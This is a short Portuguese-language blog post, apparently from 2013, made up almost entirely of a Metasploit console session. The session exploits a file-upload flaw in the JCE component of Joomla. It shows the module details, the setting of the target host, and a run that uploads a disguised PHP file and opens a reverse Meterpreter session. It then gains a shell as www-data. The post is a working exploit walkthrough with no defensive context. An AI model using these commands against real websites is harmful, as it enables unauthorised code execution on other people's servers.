quarta-feira, 27 de março de 2013

Joomla Component JCE File Upload Remote Code Execution Metasploit Module


msf > use exploit/unix/webapp/joomla_comjce_imgmanager 
msf exploit(joomla_comjce_imgmanager) > info

       Name: Joomla Component JCE File Upload Remote Code Execution
     Module: exploit/unix/webapp/joomla_comjce_imgmanager
    Version: 0
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  Heyder Andrade

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        Use a proxy chain
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       Joomla directory path
  VHOST                       no        HTTP server virtual host

Payload information:
  Space: 4000
  Avoid: 1 characters

  This module exploits a vulnerability in the JCE component for 
  Joomla!, which could allow an unauthenticated remote attacker to 
  upload arbitrary files, caused by the fails to sufficiently sanitize 
  user-supplied input. Sending specially-crafted HTTP request, a 
  remote attacker could exploit this vulnerability to upload a 
  malicious PHP script, which could allow the attacker to execute 
  arbitrary PHP code on the vulnerable system. This module has been 
  tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26.


msf exploit(joomla_comjce_imgmanager) > set RHOST
msf exploit(joomla_comjce_imgmanager) > exploit 

[*] Started reverse handler on 
[*] Checking component version to
[+] Successfully uploaded cpizwa.gif
[*] Change Extension from cpizwa.gif to cpizwa.php
[+] Renamed cpizwa.gif to cpizwa.php
[*] Calling payload: cpizwa.php
[*] Sending stage (39217 bytes) to
[*] Meterpreter session 1 opened ( -> at Wed Mar 27 22:14:31 -0300 2013
[+] Deleted cpizwa.php

meterpreter > getuid 
Server username: www-data (33)
meterpreter > shell
Process 7445 created.
Channel 0 created.
Terminate channel 0? [y/N]  y
meterpreter > quit
[*] Shutting down Meterpreter...

[*] - Meterpreter session 1 closed.  Reason: User exit
msf exploit(joomla_comjce_imgmanager) > 


Nenhum comentário: